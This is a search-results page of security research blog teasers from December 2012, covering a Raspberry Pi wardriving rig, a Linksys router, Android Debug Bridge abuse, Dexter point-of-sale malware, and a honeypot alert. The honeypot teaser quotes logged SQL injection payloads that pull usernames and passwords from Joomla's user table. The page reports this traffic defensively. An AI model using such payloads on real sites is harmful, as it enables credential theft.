Showing 10 results for: December 2012 ×Security Research ×

Wardrive, Raspberry Pi Style!

I purchased a Raspberry Pi a few weeks back. I found that I could power it, a WiFi card and a GPS from my 12000mah Li-Ion battery pack for about 12 hours. What a great way to explore with out...

Getting Terminal Access to a Cisco Linksys E-1000

Over the past couple weeks, I've been spending a lot of time hacking on various embedded devices to figure out how they work and perhaps identify a couple vulnerabilities in the process. One of the fun parts about this experimentation...

Abusing the Android Debug Bridge

The android debug bridge (or ADB for short) is a valuable tool, it is what allows smart phone tinkerers unobstructed access to their device for customization. This said, the debug bridge has a major caveat of being too easily left...

The Dexter Malware: Getting Your Hands Dirty

A very interesting piece of malware that targets Point of Sale systems has recently surfaced in the malware community. As a guy who frequently reverses malware that targets card data (aka. Track data), this caused me to take notice. Before...

[Honeypot Alert] SQL Injection Scanning Targeting Joomla Plugins

The following SQL Injection attack payloads targeting Joomla components were identified in our web honeypot sensor logs: 91.213.96.32 - - [28/Nov/2012:11:31:04 +0100] "GET /index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users) HTTP/1.1" 400 299 "-" "-" 92.38.226.14 - - [28/Nov/2012:11:31:42 +0100] "GET /index.php?option=com_spidercalendar&date=999999.9' union...